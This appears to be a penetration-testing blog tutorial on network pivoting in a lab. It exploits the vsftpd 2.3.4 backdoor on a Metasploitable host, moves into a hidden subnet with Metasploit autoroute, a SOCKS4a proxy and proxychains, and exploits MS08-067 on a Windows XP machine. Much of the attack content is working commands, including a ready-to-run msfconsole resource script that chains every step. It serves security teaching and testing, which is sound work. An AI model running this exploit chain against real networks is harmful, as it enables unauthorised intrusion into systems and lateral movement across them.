
Hello, cybersecurity enthusiasts and white-hat hackers!

pivoting 1

In this article I walk through a scenario for attacking a protected segment of a corporate network using pivoting techniques with the Metasploit Framework and proxychains.


Consider the following network topology:

(network topology diagram)

For simplicity, I chose Metasploitable as machine A and a vulnerable Windows XP SP3 box as machine B.

enum and compromise machine A

Often in a real pentest you do not know the exact addresses of the vulnerable machines in the network, so first I did host discovery. -sn is a ping sweep with no port scan, -oG - writes greppable output to stdout, and the awk filter keeps only the addresses of hosts reported as Up:

nmap -sn -T4 -oG - | awk '/Up$/{print $2}'


As you can see, our target is

Then scan:

nmap -Pn -sV


We found vsftpd 2.3.4 on port 21, a version that ships with a known backdoor. We will exploit it with the Metasploit Framework (Rapid7), one of the best-known exploitation frameworks and a standard tool for red teams and penetration testers.

First, start msfconsole:



In my case I am using Metasploit v5.0.87-dev from my Kali VM.


use exploit/unix/ftp/vsftpd_234_backdoor
set RPORT 21


As you can see, we got a command shell session. Note that this is not a reverse shell: the backdoor opens a listener on port 6200 of machine A and Metasploit connects to it.

Enumerate the network interfaces of machine A:



Machine A has a second interface on another network, which is not reachable from the attacker's host directly.

Upgrade the plain shell to a meterpreter session (the module needs the SESSION number of the shell and a listener port for the new payload):

use post/multi/manage/shell_to_meterpreter
set LPORT 4441


access hidden network via proxy

According to the scenario, the attacker now wants to reach the subnet behind the second interface. To do this, the compromised host is used as a pivot.

Check our meterpreter session:

sessions -l


The following commands add a route to the hidden subnet through the existing meterpreter session (-s adds the subnet, -p prints the routing table):

sessions -i 2
run autoroute -s
run autoroute -p


The route is now in Metasploit's routing table and stays usable only while this meterpreter session is open. In newer versions the autoroute meterpreter script is deprecated; the supported form is the post module post/multi/manage/autoroute with the SESSION, SUBNET and NETMASK options, which does the same thing.

Tools outside Metasploit, such as nmap, know nothing about that route. To let them use it, we start a SOCKS4a server inside Metasploit; connections arriving at it are forwarded through the route. In Metasploit 6 this module was merged into auxiliary/server/socks_proxy (with VERSION set to 4a):

use auxiliary/server/socks4a
set SRVPORT 8090



netstat -antp


As you can see, the proxy is listening on port 8090 immediately, and the established connection of our meterpreter session is visible as well. Binding the proxy to 0.0.0.0 exposes your pivot to anyone who can reach the attacking host; set SRVHOST to 127.0.0.1 unless you need it elsewhere.

Now we configure proxychains. proxychains hooks the socket calls of a dynamically linked program (via LD_PRELOAD) and sends every TCP connection it makes through a chain of TOR, SOCKS4, SOCKS5 or HTTP proxies. Update /etc/proxychains.conf so that the [ProxyList] section points at our SOCKS4a server on 127.0.0.1 port 8090 instead of the default Tor entry:

nvim /etc/proxychains.conf


Then scan through proxychains with nmap. Two flags matter here: -sT, because a SOCKS proxy can only carry complete TCP connections, so SYN scans and other raw-packet techniques are not proxied at all; and -Pn, because nmap's ICMP/ARP host discovery cannot go through the proxy either and the target would otherwise be reported as down. The grep keeps only the connections proxychains reports as successful, i.e. the open ports:

proxychains4 nmap -Pn -sT -p21,22,135,139,445 2>&1 | grep 'OK'

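Two small helpers for the proxychains step above, as an added example that is not part of the original post: the first rewrites the [ProxyList] of a proxychains.conf so it points at the Metasploit SOCKS4a listener, the second reduces a proxychains scan log to the ports that actually connected. The config path is a parameter (so it can be exercised on a scratch copy instead of /etc/proxychains.conf), the address 10.10.10.30 is a placeholder for machine B, and the sample log is constructed to look like proxychains-ng output, not copied from a real scan.

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Helpers for the proxychains
# step: configure the [ProxyList] for the Metasploit socks4a server and
# extract open ports from a proxychains scan log.
set -eu

# proxychains_set_socks4 <conf> <host> <port>
# Keeps everything above [ProxyList] (strict_chain, proxy_dns, ...) and
# replaces the list with a single socks4 entry. The stock file ends with
# "socks4 127.0.0.1 9050" for Tor; left in place under strict_chain it
# would make every connection fail when Tor is not running.
proxychains_set_socks4() {
  local conf="$1" host="$2" port="$3"
  grep -q '^\[ProxyList\]' "$conf" || printf '[ProxyList]\n' >>"$conf"
  sed -i '/^\[ProxyList\]/q' "$conf"            # truncate after the header
  printf 'socks4 %s %s\n' "$host" "$port" >>"$conf"
}

# proxychains_list_proxies <conf>
# Prints the active (uncommented) proxy entries, the ones proxychains uses.
proxychains_list_proxies() {
  sed -n '/^\[ProxyList\]/,$p' "$1" | grep -E '^(socks4|socks5|http)[[:space:]]' || true
}

# proxychains_open_ports  (reads a proxychains log on stdin)
# proxychains-ng logs one line per connect(): a TCP connect the SOCKS server
# completed ends in "OK", a refused or filtered one in "<--denied". The
# target is the last host:port token on the line (the token before it is the
# proxy hop), so we scan from the right to avoid picking up 127.0.0.1:8090.
proxychains_open_ports() {
  awk '/^\[proxychains\]/ && $NF == "OK" {
         for (i = NF; i > 0; i--)
           if ($i ~ /^[0-9.]+:[0-9]+$/) { print $i; break }
       }' | sort -u
}

# Constructed sample of what "proxychains4 nmap -Pn -sT ..." prints for a
# host behind the pivot (placeholder address, not a real capture).
sample_log() {
  cat <<'EOF'
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] Strict chain  ...  127.0.0.1:8090  ...  10.10.10.30:21  <--denied
[proxychains] Strict chain  ...  127.0.0.1:8090  ...  10.10.10.30:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8090  ...  10.10.10.30:139  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8090  ...  10.10.10.30:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8090  ...  10.10.10.30:22  <--denied
EOF
}

# Stand-alone demo on a scratch copy of a stock-looking config.
main() {
  local conf
  conf="$(mktemp)"
  printf 'strict_chain\nproxy_dns\n[ProxyList]\nsocks4 127.0.0.1 9050\n' >"$conf"
  proxychains_set_socks4 "$conf" 127.0.0.1 8090
  proxychains_list_proxies "$conf"        # socks4 127.0.0.1 8090
  sample_log | proxychains_open_ports     # 10.10.10.30:135, :139, :445
  rm -f "$conf"
}
main
```

Run it as root against the real file with `proxychains_set_socks4 /etc/proxychains.conf 127.0.0.1 8090`, and pipe a real scan into `proxychains_open_ports` instead of `sample_log`. Keep proxy_dns enabled in the config so that hostname lookups for hidden-network targets are also resolved through the SOCKS4a server rather than leaking to your own resolver.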

exploit and access machine B

scan machine B:

proxychains4 nmap -Pn -sT -sV


So the OS of machine B is Microsoft Windows XP.

Check SMB on port 445 with nmap's smb-vuln scripts (again -Pn and -sT, since this goes through the proxy):

proxychains4 nmap -Pn -sT -sV --script=*smb-vuln*


Machine B is reported vulnerable to MS08-067 (smb-vuln-ms08-067).

Back in msfconsole:

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell/bind_tcp
set LPORT 4447


Here we used a bind payload on purpose: Metasploit opens the connection to machine B itself, and because of the route that connection goes through the meterpreter session on machine A, so nothing has to be routed back from B to the attacker. A reverse payload would require B to reach the attacker's host, which it cannot do from the hidden network; you would need a port forward on the pivot (meterpreter's portfwd) for that.


So, the machine B has been pwned :)


To sum up, the attacker reached the hidden network through the following steps:

  • gained access to machine A (on the same network as the attacker) by exploiting vsftpd 2.3.4 on port 21
  • noticed that machine A has two network interfaces
  • added a route to the hidden network with autoroute in the meterpreter session on machine A
  • started a SOCKS4a proxy in Metasploit and pointed proxychains at it
  • scanned the newly discovered network through the proxy, then scanned machine B's ports
  • found that machine B exposes a vulnerable SMB service on port 445
  • exploited MS08-067 on machine B with a bind payload
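The whole chain above as one msfconsole resource script, an added example that is not from the original post. Everything specific is a placeholder: 192.0.2.10 is the attacker, 192.0.2.20 is machine A, 10.10.10.0/24 is the hidden subnet, 10.10.10.30 is machine B, the session numbers assume a fresh console (first session is 1), and the sleep values are only there to let sessions come up before the next module uses them. The autoroute post module and the socks4a server are the Metasploit 5 forms used in this write-up; on Metasploit 6 use auxiliary/server/socks_proxy with VERSION 4a.

```rc
# pivot.rc -- added example, not from the original post.
# Run with:  msfconsole -q -r pivot.rc
# Placeholders: attacker 192.0.2.10, machine A 192.0.2.20,
# hidden subnet 10.10.10.0/24, machine B 10.10.10.30.

# 1. machine A: vsftpd 2.3.4 backdoor, gives a command shell (session 1)
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.0.2.20
set RPORT 21
exploit -j
sleep 10

# 2. upgrade that shell to meterpreter (becomes session 2)
use post/multi/manage/shell_to_meterpreter
set SESSION 1
set LHOST 192.0.2.10
set LPORT 4441
run
sleep 15

# 3. route the hidden subnet through session 2
#    (equivalent of "run autoroute -s 10.10.10.0/24" inside the session)
use post/multi/manage/autoroute
set SESSION 2
set SUBNET 10.10.10.0
set NETMASK 255.255.255.0
run
route print

# 4. SOCKS4a listener for proxychains, bound to loopback only so the
#    pivot is not exposed to anyone else who can reach this host
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT 8090
run -j

# 5. machine B through the route; bind payload, so B never has to
#    connect back to the attacker
use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.10.10.30
set RPORT 445
set payload windows/shell/bind_tcp
set LPORT 4447
exploit
```

Steps 1 to 4 leave the console ready for the proxychains scans described above; step 5 is run only after those scans have confirmed the target, which is why in practice you would split the script in two rather than fire the second exploit blind.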

First part: pivoting via metasploit

This is a practical case for educational purposes only.

Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine